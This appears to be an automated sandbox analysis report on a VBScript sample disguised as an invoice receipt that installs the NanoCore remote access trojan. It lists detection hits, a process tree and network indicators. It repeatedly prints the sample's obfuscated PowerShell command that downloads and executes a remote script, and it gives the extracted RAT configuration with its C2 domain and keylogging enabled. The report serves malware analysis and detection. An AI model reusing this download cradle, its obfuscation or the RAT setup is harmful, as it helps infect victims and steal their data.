Loading ...

Play interactive tourEdit tour

Windows Analysis Report G2M18C6INV0ICERECEIPT.vbs

Overview

General Information

Sample Name:G2M18C6INV0ICERECEIPT.vbs
Analysis ID:553203
MD5:e193dff484ce89bc7ba5ae2022ab7227
SHA1:49d652b6e0fe6071b99fa9a7e891cc5187ebc4db
SHA256:1b8775fa633e04edf24411129b02074e4a9b8a79c28896908ff57dafe7cde968
Tags:NanoCoreRATvbs
Infos:

Most interesting Screenshot:

Detection

Nanocore HTMLPhisher
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Malicious sample detected (through community Yara rule)
Sigma detected: NanoCore
VBScript performs obfuscated calls to suspicious functions
Detected Nanocore Rat
Yara detected HtmlPhish44
Yara detected Powershell download and execute
Yara detected Nanocore RAT
Writes to foreign memory regions
Wscript starts Powershell (via cmd or directly)
Sigma detected: Suspicious PowerShell Command Line
.NET source code contains potential unpacker
Injects a PE file into a foreign processes
Creates an undocumented autostart registry key
C2 URLs / IPs found in malware configuration
Hides that the sample has been downloaded from the Internet (zone.identifier)
Uses dynamic DNS services
Queries the volume information (name, serial number etc) of a device
Yara signature match
Antivirus or Machine Learning detection for unpacked file
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
May sleep (evasive loops) to hinder dynamic analysis
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Uses code obfuscation techniques (call, push, ret)
Sigma detected: Suspicious aspnet_compiler.exe Execution
Internet Provider seen in connection with other malware
Detected potential crypto function
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Contains long sleeps (>= 3 min)
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Java / VBScript file with very long strings (likely obfuscated code)
Tries to load missing DLLs
Detected TCP or UDP traffic on non-standard ports
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Creates a process in suspended mode (likely to inject code)
Found WSH timer for Javascript or VBS script (likely evasive script)

Classification

Process Tree

  • System is w10x64
  • wscript.exe (PID: 3220 cmdline: C:\Windows\System32\wscript.exe "C:\Users\user\Desktop\G2M18C6INV0ICERECEIPT.vbs" MD5: 9A68ADD12EB50DDE7586782C3EB9FF9C)
    • powershell.exe (PID: 6152 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $Hx = 'HttP://swmen.com/ben/PS1vedy.txt';$HB=('{2}{0}{1}' -f'---------l---------o---------a---------d---------'.RePlace('---------',''),'**********s**********t**********r**********i**********n**********g**********'.RePlace('**********',''),'sss+Dsss+osss+wsss+nsss+'.RePlace('sss+',''));$HBB=('{2}{0}{1}' -f'---------e---------B---------c---------l---------'.RePlace('---------',''),'---------i---------e---------n---------t---------'.RePlace('---------',''),'---------Ne---------t---------.W---------'.RePlace('---------',''));$HBBB=('{2}{0}{1}' -f'------w-o------B------j------e------c------t $------H------'.RePlace('------',''),'------BB------).$H------B(------$H------x)------'.RePlace('------',''),'------I------`e------`X(------Ne------'.RePlace('------',''));$HBBBBB = ($HBBB -Join '')|InVoke-exPressioN MD5: 95000560239032BC68B4C2FDFCDEF913)
      • conhost.exe (PID: 6160 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
      • aspnet_compiler.exe (PID: 7112 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe MD5: 17CC69238395DF61AAF483BCEF02E7C9)
      • aspnet_compiler.exe (PID: 4860 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe MD5: 17CC69238395DF61AAF483BCEF02E7C9)
  • cleanup

Malware Configuration

Threatname: NanoCore

{"Version": "1.2.2.0", "Mutex": "fcfcc300-e950-40f9-b028-e26ea176", "Group": "test", "Domain1": "testalienscy9090.duckdns.org", "Domain2": "testalienscy9090.duckdns.org", "Port": 9090, "KeyboardLogging": "Enable", "RunOnStartup": "Disable", "RequestElevation": "Disable", "BypassUAC": "Disable", "ClearZoneIdentifier": "Enable", "ClearAccessControl": "Disable", "SetCriticalProcess": "Disable", "PreventSystemSleep": "Enable", "ActivateAwayMode": "Disable", "EnableDebugMode": "Disable", "RunDelay": 0, "ConnectDelay": 4000, "RestartDelay": 5000, "TimeoutInterval": 5000, "KeepAliveTimeout": 30000, "MutexTimeout": 5000, "LanTimeout": 2500, "WanTimeout": 8000, "BufferSize": "ffff0000", "MaxPacketSize": "0000a000", "GCThreshold": "0000a000", "UseCustomDNS": "Enable", "PrimaryDNSServer": "8.8.8.8", "BackupDNSServer": "8.8.4.4"}

Yara Overview

Dropped Files

SourceRuleDescriptionAuthorStrings
C:\ProgramData\5197349279415287975939\5197349279415287975939.HTAJoeSecurity_HtmlPhish_44Yara detected HtmlPhish_44Joe Security

    Memory Dumps

    SourceRuleDescriptionAuthorStrings
    0000000F.00000000.290807365.0000000000402000.00000040.00000001.sdmpNanocore_RAT_Gen_2Detetcs the Nanocore RATFlorian Roth
    • 0xff8d:$x1: NanoCore.ClientPluginHost
    • 0xffca:$x2: IClientNetworkHost
    • 0x13afd:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
    0000000F.00000000.290807365.0000000000402000.00000040.00000001.sdmpJoeSecurity_NanocoreYara detected Nanocore RATJoe Security
      0000000F.00000000.290807365.0000000000402000.00000040.00000001.sdmpNanoCoreunknown Kevin Breen <kevin@techanarchy.net>
      • 0xfcf5:$a: NanoCore
      • 0xfd05:$a: NanoCore
      • 0xff39:$a: NanoCore
      • 0xff4d:$a: NanoCore
      • 0xff8d:$a: NanoCore
      • 0xfd54:$b: ClientPlugin
      • 0xff56:$b: ClientPlugin
      • 0xff96:$b: ClientPlugin
      • 0xfe7b:$c: ProjectData
      • 0x10882:$d: DESCrypto
      • 0x1824e:$e: KeepAlive
      • 0x1623c:$g: LogClientMessage
      • 0x12437:$i: get_Connected
      • 0x10bb8:$j: #=q
      • 0x10be8:$j: #=q
      • 0x10c04:$j: #=q
      • 0x10c34:$j: #=q
      • 0x10c50:$j: #=q
      • 0x10c6c:$j: #=q
      • 0x10c9c:$j: #=q
      • 0x10cb8:$j: #=q
      00000001.00000002.312159076.000001C73FECA000.00000004.00000001.sdmpNanocore_RAT_Gen_2Detetcs the Nanocore RATFlorian Roth
      • 0x12cc5:$x1: NanoCore.ClientPluginHost
      • 0x12d02:$x2: IClientNetworkHost
      • 0x16835:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
      00000001.00000002.312159076.000001C73FECA000.00000004.00000001.sdmpJoeSecurity_NanocoreYara detected Nanocore RATJoe Security
        Click to see the 19 entries

        Unpacked PEs

        SourceRuleDescriptionAuthorStrings
        15.0.aspnet_compiler.exe.400000.2.unpackNanocore_RAT_Gen_2Detetcs the Nanocore RATFlorian Roth
        • 0x1018d:$x1: NanoCore.ClientPluginHost
        • 0x101ca:$x2: IClientNetworkHost
        • 0x13cfd:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
        15.0.aspnet_compiler.exe.400000.2.unpackNanocore_RAT_Feb18_1Detects Nanocore RATFlorian Roth
        • 0xff05:$x1: NanoCore Client.exe
        • 0x1018d:$x2: NanoCore.ClientPluginHost
        • 0x117c6:$s1: PluginCommand
        • 0x117ba:$s2: FileCommand
        • 0x1266b:$s3: PipeExists
        • 0x18422:$s4: PipeCreated
        • 0x101b7:$s5: IClientLoggingHost
        15.0.aspnet_compiler.exe.400000.2.unpackJoeSecurity_NanocoreYara detected Nanocore RATJoe Security
          15.0.aspnet_compiler.exe.400000.2.unpackNanoCoreunknown Kevin Breen <kevin@techanarchy.net>
          • 0xfef5:$a: NanoCore
          • 0xff05:$a: NanoCore
          • 0x10139:$a: NanoCore
          • 0x1014d:$a: NanoCore
          • 0x1018d:$a: NanoCore
          • 0xff54:$b: ClientPlugin
          • 0x10156:$b: ClientPlugin
          • 0x10196:$b: ClientPlugin
          • 0x1007b:$c: ProjectData
          • 0x10a82:$d: DESCrypto
          • 0x1844e:$e: KeepAlive
          • 0x1643c:$g: LogClientMessage
          • 0x12637:$i: get_Connected
          • 0x10db8:$j: #=q
          • 0x10de8:$j: #=q
          • 0x10e04:$j: #=q
          • 0x10e34:$j: #=q
          • 0x10e50:$j: #=q
          • 0x10e6c:$j: #=q
          • 0x10e9c:$j: #=q
          • 0x10eb8:$j: #=q
          15.0.aspnet_compiler.exe.400000.1.unpackNanocore_RAT_Gen_2Detetcs the Nanocore RATFlorian Roth
          • 0x1018d:$x1: NanoCore.ClientPluginHost
          • 0x101ca:$x2: IClientNetworkHost
          • 0x13cfd:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
          Click to see the 31 entries

          Sigma Overview

          AV Detection:

          barindex
          Sigma detected: NanoCoreShow sources
          Source: File createdAuthor: Joe Security: Data: EventID: 11, Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe, ProcessId: 4860, TargetFilename: C:\Users\user\AppData\Roaming\D06ED635-68F6-4E9A-955C-4899F5F57B9A\run.dat

          E-Banking Fraud:

          barindex
          Sigma detected: NanoCoreShow sources
          Source: File createdAuthor: Joe Security: Data: EventID: 11, Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe, ProcessId: 4860, TargetFilename: C:\Users\user\AppData\Roaming\D06ED635-68F6-4E9A-955C-4899F5F57B9A\run.dat

          System Summary:

          barindex
          Sigma detected: Suspicious PowerShell Command LineShow sources
          Source: Process startedAuthor: Teymur Kheirkhabarov (idea), Vasiliy Burov (rule), oscd.community, Tim Shelton (fp): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $Hx = 'HttP://swmen.com/ben/PS1vedy.txt';$HB=('{2}{0}{1}' -f'---------l---------o---------a---------d---------'.RePlace('---------',''),'**********s**********t**********r**********i**********n**********g**********'.RePlace('**********',''),'sss+Dsss+osss+wsss+nsss+'.RePlace('sss+',''));$HBB=('{2}{0}{1}' -f'---------e---------B---------c---------l---------'.RePlace('---------',''),'---------i---------e---------n---------t---------'.RePlace('---------',''),'---------Ne---------t---------.W---------'.RePlace('---------',''));$HBBB=('{2}{0}{1}' -f'------w-o------B------j------e------c------t $------H------'.RePlace('------',''),'------BB------).$H------B(------$H------x)------'.RePlace('------',''),'------I------`e------`X(------Ne------'.RePlace('------',''));$HBBBBB = ($HBBB -Join '')|InVoke-exPressioN, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $Hx = 'HttP://swmen.com/ben/PS1vedy.txt';$HB=('{2}{0}{1}' -f'---------l---------o---------a---------d---------'.RePlace('---------',''),'**********s**********t**********r**********i**********n**********g**********'.RePlace('**********',''),'sss+Dsss+osss+wsss+nsss+'.RePlace('sss+',''));$HBB=('{2}{0}{1}' -f'---------e---------B---------c---------l---------'.RePlace('---------',''),'---------i---------e---------n---------t---------'.RePlace('---------',''),'---------Ne---------t---------.W---------'.RePlace('---------',''));$HBBB=('{2}{0}{1}' -f'------w-o------B------j------e------c------t $------H------'.RePlace('------',''),'------BB------).$H------B(------$H------x)------'.RePlace('------',''),'------I------`e------`X(------Ne------'.RePlace('------',''));$HBBBBB = ($HBBB -Join '')|InVoke-exPressioN, CommandLine|base64offset|contains: , Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\System32\wscript.exe "C:\Users\user\Desktop\G2M18C6INV0ICERECEIPT.vbs", ParentImage: C:\Windows\System32\wscript.exe, ParentProcessId: 3220, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $Hx = 'HttP://swmen.com/ben/PS1vedy.txt';$HB=('{2}{0}{1}' -f'---------l---------o---------a---------d---------'.RePlace('---------',''),'**********s**********t**********r**********i**********n**********g**********'.RePlace('**********',''),'sss+Dsss+osss+wsss+nsss+'.RePlace('sss+',''));$HBB=('{2}{0}{1}' -f'---------e---------B---------c---------l---------'.RePlace('---------',''),'---------i---------e---------n---------t---------'.RePlace('---------',''),'---------Ne---------t---------.W---------'.RePlace('---------',''));$HBBB=('{2}{0}{1}' -f'------w-o------B------j------e------c------t $------H------'.RePlace('------',''),'------BB------).$H------B(------$H------x)------'.RePlace('------',''),'------I------
          Sigma detected: Suspicious aspnet_compiler.exe ExecutionShow sources
          Source: Process startedAuthor: frack113: Data: Command: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe, CommandLine: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe, CommandLine|base64offset|contains: , Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe, ParentCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $Hx = 'HttP://swmen.com/ben/PS1vedy.txt';$HB=('{2}{0}{1}' -f'---------l---------o---------a---------d---------'.RePlace('---------',''),'**********s**********t**********r**********i**********n**********g**********'.RePlace('**********',''),'sss+Dsss+osss+wsss+nsss+'.RePlace('sss+',''));$HBB=('{2}{0}{1}' -f'---------e---------B---------c---------l---------'.RePlace('---------',''),'---------i---------e---------n---------t---------'.RePlace('---------',''),'---------Ne---------t---------.W---------'.RePlace('---------',''));$HBBB=('{2}{0}{1}' -f'------w-o------B------j------e------c------t $------H------'.RePlace('------',''),'------BB------).$H------B(------$H------x)------'.RePlace('------',''),'------I------`e------`X(------Ne------'.RePlace('------',''));$HBBBBB = ($HBBB -Join '')|InVoke-exPressioN, ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 6152, ProcessCommandLine: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe, ProcessId: 7112
          Sigma detected: Non Interactive PowerShellShow sources
          Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $Hx = 'HttP://swmen.com/ben/PS1vedy.txt';$HB=('{2}{0}{1}' -f'---------l---------o---------a---------d---------'.RePlace('---------',''),'**********s**********t**********r**********i**********n**********g**********'.RePlace('**********',''),'sss+Dsss+osss+wsss+nsss+'.RePlace('sss+',''));$HBB=('{2}{0}{1}' -f'---------e---------B---------c---------l---------'.RePlace('---------',''),'---------i---------e---------n---------t---------'.RePlace('---------',''),'---------Ne---------t---------.W---------'.RePlace('---------',''));$HBBB=('{2}{0}{1}' -f'------w-o------B------j------e------c------t $------H------'.RePlace('------',''),'------BB------).$H------B(------$H------x)------'.RePlace('------',''),'------I------`e------`X(------Ne------'.RePlace('------',''));$HBBBBB = ($HBBB -Join '')|InVoke-exPressioN, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $Hx = 'HttP://swmen.com/ben/PS1vedy.txt';$HB=('{2}{0}{1}' -f'---------l---------o---------a---------d---------'.RePlace('---------',''),'**********s**********t**********r**********i**********n**********g**********'.RePlace('**********',''),'sss+Dsss+osss+wsss+nsss+'.RePlace('sss+',''));$HBB=('{2}{0}{1}' -f'---------e---------B---------c---------l---------'.RePlace('---------',''),'---------i---------e---------n---------t---------'.RePlace('---------',''),'---------Ne---------t---------.W---------'.RePlace('---------',''));$HBBB=('{2}{0}{1}' -f'------w-o------B------j------e------c------t $------H------'.RePlace('------',''),'------BB------).$H------B(------$H------x)------'.RePlace('------',''),'------I------`e------`X(------Ne------'.RePlace('------',''));$HBBBBB = ($HBBB -Join '')|InVoke-exPressioN, CommandLine|base64offset|contains: , Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\System32\wscript.exe "C:\Users\user\Desktop\G2M18C6INV0ICERECEIPT.vbs", ParentImage: C:\Windows\System32\wscript.exe, ParentProcessId: 3220, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $Hx = 'HttP://swmen.com/ben/PS1vedy.txt';$HB=('{2}{0}{1}' -f'---------l---------o---------a---------d---------'.RePlace('---------',''),'**********s**********t**********r**********i**********n**********g**********'.RePlace('**********',''),'sss+Dsss+osss+wsss+nsss+'.RePlace('sss+',''));$HBB=('{2}{0}{1}' -f'---------e---------B---------c---------l---------'.RePlace('---------',''),'---------i---------e---------n---------t---------'.RePlace('---------',''),'---------Ne---------t---------.W---------'.RePlace('---------',''));$HBBB=('{2}{0}{1}' -f'------w-o------B------j------e------c------t $------H------'.RePlace('------',''),'------BB------).$H------B(------$H------x)------'.RePlace('------',''),'------I------
          Sigma detected: T1086 PowerShell ExecutionShow sources
          Source: Pipe createdAuthor: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research): Data: PipeName: \PSHost.132866697195739828.6152.DefaultAppDomain.powershell

          Stealing of Sensitive Information:

          barindex
          Sigma detected: NanoCoreShow sources
          Source: File createdAuthor: Joe Security: Data: EventID: 11, Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe, ProcessId: 4860, TargetFilename: C:\Users\user\AppData\Roaming\D06ED635-68F6-4E9A-955C-4899F5F57B9A\run.dat

          Remote Access Functionality:

          barindex
          Sigma detected: NanoCoreShow sources
          Source: File createdAuthor: Joe Security: Data: EventID: 11, Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe, ProcessId: 4860, TargetFilename: C:\Users\user\AppData\Roaming\D06ED635-68F6-4E9A-955C-4899F5F57B9A\run.dat

          Jbx Signature Overview

          Click to jump to signature section

          Show All Signature Results

          AV Detection:

          barindex
          Found malware configurationShow sources
          Source: 15.0.aspnet_compiler.exe.400000.2.unpackMalware Configuration Extractor: NanoCore {"Version": "1.2.2.0", "Mutex": "fcfcc300-e950-40f9-b028-e26ea176", "Group": "test", "Domain1": "testalienscy9090.duckdns.org", "Domain2": "testalienscy9090.duckdns.org", "Port": 9090, "KeyboardLogging": "Enable", "RunOnStartup": "Disable", "RequestElevation": "Disable", "BypassUAC": "Disable", "ClearZoneIdentifier": "Enable", "ClearAccessControl": "Disable", "SetCriticalProcess": "Disable", "PreventSystemSleep": "Enable", "ActivateAwayMode": "Disable", "EnableDebugMode": "Disable", "RunDelay": 0, "ConnectDelay": 4000, "RestartDelay": 5000, "TimeoutInterval": 5000, "KeepAliveTimeout": 30000, "MutexTimeout": 5000, "LanTimeout": 2500, "WanTimeout": 8000, "BufferSize": "ffff0000", "MaxPacketSize": "0000a000", "GCThreshold": "0000a000", "UseCustomDNS": "Enable", "PrimaryDNSServer": "8.8.8.8", "BackupDNSServer": "8.8.4.4"}
          Yara detected Nanocore RATShow sources
          Source: Yara matchFile source: 15.0.aspnet_compiler.exe.400000.2.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 15.0.aspnet_compiler.exe.400000.1.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.2.powershell.exe.1c73feccb38.2.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 15.0.aspnet_compiler.exe.400000.3.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.2.powershell.exe.1c73feccb38.2.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 15.0.aspnet_compiler.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.2.powershell.exe.1c73f60e7c8.1.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 15.0.aspnet_compiler.exe.400000.4.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.2.powershell.exe.1c73f60e7c8.1.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0000000F.00000000.290807365.0000000000402000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.312159076.000001C73FECA000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000F.00000000.291533940.0000000000402000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000F.00000000.292171904.0000000000402000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000F.00000000.291180768.0000000000402000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.303994520.000001C73F3F3000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 6152, type: MEMORYSTR
          Source: Yara matchFile source: Process Memory Space: aspnet_compiler.exe PID: 4860, type: MEMORYSTR
          Source: 15.0.aspnet_compiler.exe.400000.2.unpackAvira: Label: TR/Dropper.MSIL.Gen7
          Source: 15.0.aspnet_compiler.exe.400000.3.unpackAvira: Label: TR/Dropper.MSIL.Gen7
          Source: 15.0.aspnet_compiler.exe.400000.4.unpackAvira: Label: TR/Dropper.MSIL.Gen7
          Source: 15.0.aspnet_compiler.exe.400000.0.unpackAvira: Label: TR/Dropper.MSIL.Gen7
          Source: 15.0.aspnet_compiler.exe.400000.1.unpackAvira: Label: TR/Dropper.MSIL.Gen7

          Phishing:

          barindex
          Yara detected HtmlPhish44Show sources
          Source: Yara matchFile source: C:\ProgramData\5197349279415287975939\5197349279415287975939.HTA, type: DROPPED

          Networking:

          barindex
          Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)Show sources
          Source: TrafficSnort IDS: 2025019 ET TROJAN Possible NanoCore C2 60B 192.168.2.5:49764 -> 185.140.53.10:9090
          Source: TrafficSnort IDS: 2025019 ET TROJAN Possible NanoCore C2 60B 192.168.2.5:49765 -> 185.140.53.10:9090
          Source: TrafficSnort IDS: 2025019 ET TROJAN Possible NanoCore C2 60B 192.168.2.5:49766 -> 185.140.53.10:9090
          Source: TrafficSnort IDS: 2025019 ET TROJAN Possible NanoCore C2 60B 192.168.2.5:49771 -> 185.140.53.10:9090
          Source: TrafficSnort IDS: 2025019 ET TROJAN Possible NanoCore C2 60B 192.168.2.5:49775 -> 185.140.53.10:9090
          Source: TrafficSnort IDS: 2025019 ET TROJAN Possible NanoCore C2 60B 192.168.2.5:49783 -> 185.140.53.10:9090
          Source: TrafficSnort IDS: 2025019 ET TROJAN Possible NanoCore C2 60B 192.168.2.5:49789 -> 185.140.53.10:9090
          Source: TrafficSnort IDS: 2025019 ET TROJAN Possible NanoCore C2 60B 192.168.2.5:49794 -> 185.140.53.10:9090
          Source: TrafficSnort IDS: 2025019 ET TROJAN Possible NanoCore C2 60B 192.168.2.5:49826 -> 185.140.53.10:9090
          Source: TrafficSnort IDS: 2025019 ET TROJAN Possible NanoCore C2 60B 192.168.2.5:49827 -> 185.140.53.10:9090
          Source: TrafficSnort IDS: 2025019 ET TROJAN Possible NanoCore C2 60B 192.168.2.5:49830 -> 185.140.53.10:9090
          Source: TrafficSnort IDS: 2025019 ET TROJAN Possible NanoCore C2 60B 192.168.2.5:49839 -> 185.140.53.10:9090
          Source: TrafficSnort IDS: 2025019 ET TROJAN Possible NanoCore C2 60B 192.168.2.5:49854 -> 185.140.53.10:9090
          Source: TrafficSnort IDS: 2025019 ET TROJAN Possible NanoCore C2 60B 192.168.2.5:49856 -> 185.140.53.10:9090
          Source: TrafficSnort IDS: 2025019 ET TROJAN Possible NanoCore C2 60B 192.168.2.5:49857 -> 185.140.53.10:9090
          Source: TrafficSnort IDS: 2025019 ET TROJAN Possible NanoCore C2 60B 192.168.2.5:49858 -> 185.140.53.10:9090
          Source: TrafficSnort IDS: 2025019 ET TROJAN Possible NanoCore C2 60B 192.168.2.5:49859 -> 185.140.53.10:9090
          Source: TrafficSnort IDS: 2025019 ET TROJAN Possible NanoCore C2 60B 192.168.2.5:49861 -> 185.140.53.10:9090
          Source: TrafficSnort IDS: 2025019 ET TROJAN Possible NanoCore C2 60B 192.168.2.5:49862 -> 185.140.53.10:9090
          Source: TrafficSnort IDS: 2025019 ET TROJAN Possible NanoCore C2 60B 192.168.2.5:49863 -> 185.140.53.10:9090
          Source: TrafficSnort IDS: 2025019 ET TROJAN Possible NanoCore C2 60B 192.168.2.5:49864 -> 185.140.53.10:9090
          Source: TrafficSnort IDS: 2025019 ET TROJAN Possible NanoCore C2 60B 192.168.2.5:49866 -> 185.140.53.10:9090
          Source: TrafficSnort IDS: 2025019 ET TROJAN Possible NanoCore C2 60B 192.168.2.5:49867 -> 185.140.53.10:9090
          Source: TrafficSnort IDS: 2025019 ET TROJAN Possible NanoCore C2 60B 192.168.2.5:49868 -> 185.140.53.10:9090
          Source: TrafficSnort IDS: 2025019 ET TROJAN Possible NanoCore C2 60B 192.168.2.5:49869 -> 185.140.53.10:9090
          Source: TrafficSnort IDS: 2025019 ET TROJAN Possible NanoCore C2 60B 192.168.2.5:49870 -> 185.140.53.10:9090
          Source: TrafficSnort IDS: 2025019 ET TROJAN Possible NanoCore C2 60B 192.168.2.5:49872 -> 185.140.53.10:9090
          Source: TrafficSnort IDS: 2025019 ET TROJAN Possible NanoCore C2 60B 192.168.2.5:49873 -> 185.140.53.10:9090
          Source: TrafficSnort IDS: 2025019 ET TROJAN Possible NanoCore C2 60B 192.168.2.5:49874 -> 185.140.53.10:9090
          Source: TrafficSnort IDS: 2025019 ET TROJAN Possible NanoCore C2 60B 192.168.2.5:49875 -> 185.140.53.10:9090
          Source: TrafficSnort IDS: 2025019 ET TROJAN Possible NanoCore C2 60B 192.168.2.5:49877 -> 185.140.53.10:9090
          Source: TrafficSnort IDS: 2025019 ET TROJAN Possible NanoCore C2 60B 192.168.2.5:49878 -> 185.140.53.10:9090
          C2 URLs / IPs found in malware configurationShow sources
          Source: Malware configuration extractorURLs: testalienscy9090.duckdns.org
          Uses dynamic DNS servicesShow sources
          Source: unknownDNS query: name: testalienscy9090.duckdns.org
          Source: Joe Sandbox ViewASN Name: DAVID_CRAIGGG DAVID_CRAIGGG
          Source: Joe Sandbox ViewASN Name: AS-26496-GO-DADDY-COM-LLCUS AS-26496-GO-DADDY-COM-LLCUS
          Source: global trafficHTTP traffic detected: GET /ben/PS1vedy.txt HTTP/1.1Host: swmen.comConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /ben/ServerATEVN.txt HTTP/1.1Host: swmen.com
          Source: Joe Sandbox ViewIP Address: 185.140.53.10 185.140.53.10
          Source: global trafficTCP traffic: 192.168.2.5:49764 -> 185.140.53.10:9090
          Source: PowerShell_transcript.210979.BVPagTEC.20220114133521.txt.1.drString found in binary or memory: HttP://swmen.com/ben/PS1vedy.txt
          Source: powershell.exe, 00000001.00000002.313691963.000001C7476D0000.00000004.00000001.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
          Source: powershell.exe, 00000001.00000003.275487622.000001C747BAD000.00000004.00000001.sdmp, powershell.exe, 00000001.00000002.314491027.000001C747BA2000.00000004.00000001.sdmpString found in binary or memory: http://crl.microsoft.co
          Source: powershell.exe, 00000001.00000002.303994520.000001C73F3F3000.00000004.00000001.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
          Source: powershell.exe, 00000001.00000002.297299078.000001C72F59F000.00000004.00000001.sdmp, powershell.exe, 00000001.00000003.244374446.000001C747B51000.00000004.00000001.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
          Source: powershell.exe, 00000001.00000002.296912388.000001C72F391000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
          Source: powershell.exe, 00000001.00000002.297299078.000001C72F59F000.00000004.00000001.sdmpString found in binary or memory: http://swmen.com
          Source: powershell.exe, 00000001.00000002.297299078.000001C72F59F000.00000004.00000001.sdmpString found in binary or memory: http://swmen.com/ben/PS1vedy.txt
          Source: powershell.exe, 00000001.00000002.297834040.000001C72F76A000.00000004.00000001.sdmpString found in binary or memory: http://swmen.com/ben/ServerATEVN.txt
          Source: powershell.exe, 00000001.00000003.274331638.000001C730C9D000.00000004.00000001.sdmp, powershell.exe, 00000001.00000002.303763663.000001C73063E000.00000004.00000001.sdmp, powershell.exe, 00000001.00000002.314395774.000001C747B00000.00000004.00020000.sdmp, powershell.exe, 00000001.00000003.274337560.000001C730CA2000.00000004.00000001.sdmp, powershell.exe, 00000001.00000003.274353820.000001C730CC7000.00000004.00000001.sdmp, powershell.exe, 00000001.00000002.297834040.000001C72F76A000.00000004.00000001.sdmp, 5197349279415287975939.HTA.1.drString found in binary or memory: http://swmen.com/ben/ServerATEVN.txt%27%3B%24
          Source: powershell.exe, 00000001.00000002.297299078.000001C72F59F000.00000004.00000001.sdmp, powershell.exe, 00000001.00000003.244374446.000001C747B51000.00000004.00000001.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
          Source: powershell.exe, 00000001.00000002.303994520.000001C73F3F3000.00000004.00000001.sdmpString found in binary or memory: https://contoso.com/
          Source: powershell.exe, 00000001.00000002.303994520.000001C73F3F3000.00000004.00000001.sdmpString found in binary or memory: https://contoso.com/Icon
          Source: powershell.exe, 00000001.00000002.303994520.000001C73F3F3000.00000004.00000001.sdmpString found in binary or memory: https://contoso.com/License
